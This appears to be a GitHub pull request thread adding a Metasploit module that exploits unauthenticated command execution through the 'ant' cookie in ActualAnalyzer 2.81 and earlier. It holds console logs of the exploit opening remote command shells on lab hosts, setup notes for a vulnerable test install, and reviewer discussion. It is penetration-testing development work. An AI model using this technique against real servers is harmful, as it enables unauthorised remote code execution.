Add actualanalyzer_ant_cookie_exec exploit #4328

Merged
merged 3 commits into from Dec 15, 2014

Projects

None yet

5 participants

@bcoles
Contributor
bcoles commented Dec 6, 2014

This module exploits a command execution vulnerability in ActualAnalyzer version 2.81 and prior.

The 'aa.php' file allows unauthenticated users to execute arbitrary commands in the 'ant' cookie.

Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu 10.04.3 (PHP 5.3.2-1ubuntu4.17)

Output

msf exploit(actualanalyzer_ant_cookie_exec) > check
[+] 192.168.13.141:80 - The target is vulnerable.
msf exploit(actualanalyzer_ant_cookie_exec) > set verbose true
verbose => true
msf exploit(actualanalyzer_ant_cookie_exec) > check
[*] 192.168.13.141:80 - Found version: 2.81
[+] 192.168.13.141:80 - The target is vulnerable.
msf exploit(actualanalyzer_ant_cookie_exec) > set verbose true
verbose => true
msf exploit(actualanalyzer_ant_cookie_exec) > run

[*] Started reverse double handler
[+] 192.168.13.141:80 - Found analytics host: bt
[*] 192.168.13.141:80 - Sending payload (531 bytes)...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] 192.168.13.141:80 - Payload sent successfully
[*] Command: echo 2rAYCSKKNtZMdJ57;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n2rAYCSKKNtZMdJ57\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.13.132:4444 -> 192.168.13.141:52285) at 2014-12-06 13:43:52 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.13.141 - Command shell session 1 closed.  Reason: User exit

Source:

  • ActualAnalyzer Lite 2.81:
    hxxp://www.actualscripts.com/products/analyzer/downloads/editions/lite/file.php?file=lite281.zip
  • ActualAnalyzer Lite 2.75:
    hxxps://web.archive.org/web/20061114040847/http://www.actualscripts.com/products/analyzer/downloads/editions/lite/lite275.zip
@wchen-r7 wchen-r7 added the module label Dec 6, 2014
@wvu-r7 wvu-r7 assigned wvu-r7 and unassigned wvu-r7 Dec 8, 2014
@jhart-r7 jhart-r7 self-assigned this Dec 12, 2014
@jhart-r7 jhart-r7 commented on an outdated diff Dec 12, 2014
...xploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -0,0 +1,242 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
@jhart-r7
jhart-r7 Dec 12, 2014 Contributor

missing the :. msftidy now checks for this.

@jhart-r7
Contributor

This actually all looks fairly clean. The only big thing I'd like to see added, which I can do, is to mixin Scanner so it can be run at piles of hosts at once. I'll try to get a PR over to you tomorrow for review.

@wvu-r7
Contributor
wvu-r7 commented Dec 12, 2014

Thanks, @jhart-r7. Kinda engaged on other projects. The only thing I might change in this module is the use of case statements instead of complicated if statements.

@jhart-r7
Contributor

@bcoles , do you have any tips on how to get actualanalyzer running on Ubuntu? At least with 12.04, apache2 and php5, the install just 500s with no useful log entries after I enter the database information -- I suspect this version of php is too new/cool for it.

@jhart-r7 jhart-r7 referenced this pull request in bcoles/metasploit-framework Dec 12, 2014
Merged

Minor improvements to actual analyzer ant cookie exploit #1

@jhart-r7
Contributor

I seem to have gotten 2.81 running on Ubuntu 8.04. check marks it as vulnerable and exploit claims to succeed but the payloads I've tried all seem to generate errors server-side:

sh: Syntax error: word unexpected (expecting ")")
sh: Syntax error: Bad for loop variable
sh: Syntax error: Bad function name
sh: Syntax error: Bad function name
sh: Syntax error: Bad function name
sh: Syntax error: Bad for loop variable

I haven't really looked into what is causing this. @bcoles , any details you can share on your setup would help.

@bcoles
Contributor
bcoles commented Dec 14, 2014

@jhart-r7 I've tested with ActualAnalyzer versions 2.81 and 2.75 on:

  • Apache 2.2.14 (PHP 5.3.2-1ubuntu4.17) on Ubuntu 10.04.3
  • Apache 2.2.22 (PHP 5.4.4-14deb7u14) on Debian 7

Some install notes;

# dependencies
apt-get install apache2 mysql-server
apt-get install php5 php5-mysql php5-gd
service apache2 restart

# create db
mysql -h localhost -u root -p -e "create database analyzer;"

# get source
cd /var/www/
#wget source.zip && unzip source.zip
chmod 777 lite
@jhart-r7
Contributor

The Travis failure is almost certainly unrelated. I opened #4398 to track the failure but restarted Travis which should clear this up in ~30m.

@jhart-r7
Contributor

Ah, it looks like the issue for me on Ubuntu 8.04 was magic quotes, which was on by default back then but has since been removed.

@jhart-r7
Contributor

Looks good here. Landing. Validation:

Non-verbose, check and exploit against a vulnerable host:

msf exploit(actualanalyzer_ant_cookie_exec) > set VERBOSE false
VERBOSE => false
msf exploit(actualanalyzer_ant_cookie_exec) > check
[+] actualanalyzer-2-8-1-804.vuln:80 - The target is vulnerable.
msf exploit(actualanalyzer_ant_cookie_exec) > run

[*] Started bind handler
[+] actualanalyzer-2-8-1-804.vuln:80 - Login successful! (admin:admin)
[+] actualanalyzer-2-8-1-804.vuln:80 - Payload sent successfully
[*] Command shell session 8 opened (172.16.10.138:42508 -> 10.4.29.4:4444) at 2014-12-15 09:15:02 -0800

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Verbose, check and exploit against a vulnerable host:

msf exploit(actualanalyzer_ant_cookie_exec) > check

[*] actualanalyzer-2-8-1-804.vuln:80 - Found version: 2.81
[+] actualanalyzer-2-8-1-804.vuln:80 - The target is vulnerable.
msf exploit(actualanalyzer_ant_cookie_exec) > run

[*] Started bind handler
[+] actualanalyzer-2-8-1-804.vuln:80 - Found analytics host: 10.4.29.4
[+] actualanalyzer-2-8-1-804.vuln:80 - Found analytics host: 10.4.29.4
[+] actualanalyzer-2-8-1-804.vuln:80 - Found analytics host: 10.4.29.4
[+] actualanalyzer-2-8-1-804.vuln:80 - Login successful! (admin:admin)
[*] actualanalyzer-2-8-1-804.vuln:80 - Trying hostname '10.4.29.4' - Sending payload (979 bytes)...
[+] actualanalyzer-2-8-1-804.vuln:80 - Payload sent successfully
[*] Command shell session 7 opened (172.16.10.138:54047 -> 10.4.29.4:4444) at 2014-12-15 09:14:43 -0800

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
@jhart-r7 jhart-r7 merged commit 4530066 into rapid7:master Dec 15, 2014

1 check passed

continuous-integration/travis-ci The Travis CI build passed
Details
@jhart-r7 jhart-r7 added a commit that referenced this pull request Dec 15, 2014
@jhart-r7 jhart-r7 Land #4328, @bcoles' exploit for ActualAnalyzer < 2.81 'ant' code exe…
…cution
effb5b9
@jhart-r7
Contributor

Landed. Thanks for the contribution, @bcoles. I made a few minor changes prior to landing -- see the final version (effb5b9)

@wvu-r7
Contributor
wvu-r7 commented Dec 15, 2014

And thanks for handling this, @jhart-r7. :)

@bcoles bcoles deleted the bcoles:actualanalyzer_ant_cookie_exec branch Dec 21, 2014
@coveralls

Coverage Status

Changes Unknown when pulling 4530066 on bcoles:actualanalyzer_ant_cookie_exec into * on rapid7:master*.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment